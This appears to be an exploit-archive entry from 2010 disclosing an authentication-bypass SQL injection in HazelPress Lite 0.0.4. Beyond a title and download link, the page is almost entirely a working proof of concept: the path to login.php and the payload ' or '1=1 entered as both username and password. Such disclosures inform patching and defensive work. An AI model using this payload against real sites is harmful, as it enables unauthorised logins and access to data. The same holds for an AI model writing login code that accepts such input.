HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
# Published : 2010-02-28
# Author : cr4wl3r
# Previous Title : Galerie Dezign-Box France Multi Vulnerability
# Next Title : Arab Cart Version v1.0.2.0 Multiple Vulnerabilities

# HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
# By cr4wl3r
# Download: http://hazelpress.org/index.php?hazel=downloads

# PoC: [path]/login.php

# Username: ' or '1=1
# password: ' or '1=1